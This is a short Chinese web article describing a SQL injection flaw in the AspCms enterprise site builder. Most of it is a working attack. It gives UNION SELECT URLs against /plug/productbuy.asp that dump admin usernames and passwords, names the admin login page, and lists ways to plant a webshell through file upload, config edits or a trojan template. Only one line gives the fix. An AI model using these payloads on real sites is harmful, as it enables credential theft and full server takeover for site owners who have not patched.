aspcms企业建站系统0day漏洞介绍
作者:075玩 来源:互联网 2023-08-29 10:20:07
漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转,所以要快,建议用快捷键复制爆用户名/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........爆密码/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1后台登录地址:/admin/login.asp后台拿shell1、直接上传.asp;x2、系统配置信息3、模版管理新建1.asp模板,内容写马的内容.修复方法: id用cint(request("id"))
- 上一篇:fla是什么文件 fla文件如何打开 .fla怎么打开
- 下一篇:返回列表
- aspcms企业建站系统0day漏洞介绍
- fla是什么文件 fla文件如何打开 .fla怎么打开
- BIOS开启AHCI模式是什么意思 BIOS中的硬盘模式设置为AHCI
- Win10游戏如何窗口化 win10游戏窗口化怎么全屏
- 如何卸载最近的Windows更新 如何卸载最近系统更新
- Win10桌面图标有小箭头怎么去掉 windows10桌面小图标上的箭头去除
- AI文件用什么软件才能打开 ai文件用什么软件可以打开
- 爆料称索尼正在研发 PS5 Pro,预计 2024 年发布 索尼ps5官方发售价格
- win10怎么修改中英文切换快捷键 windows10中英文切换快捷键怎么改
- VoIP通信公司3CX遭受黑客攻击,恶意程序悄悄植入Windows应用
- 本类推荐
- 本类排行
- 1aspcms企业建站系统0day漏洞介绍
- 2fla是什么文件 fla文件如何打开 .fla怎么打开
- 3BIOS开启AHCI模式是什么意思 BIOS中的硬盘模式设置为AHCI
- 4Win10游戏如何窗口化 win10游戏窗口化怎么全屏
- 5如何卸载最近的Windows更新 如何卸载最近系统更新
- 6Win10桌面图标有小箭头怎么去掉 windows10桌面小图标上的箭头去除
- 7AI文件用什么软件才能打开 ai文件用什么软件可以打开
- 8爆料称索尼正在研发 PS5 Pro,预计 2024 年发布 索尼ps5官方发售价格
- 9win10怎么修改中英文切换快捷键 windows10中英文切换快捷键怎么改
- 10VoIP通信公司3CX遭受黑客攻击,恶意程序悄悄植入Windows应用
- 热门软件
- 热门标签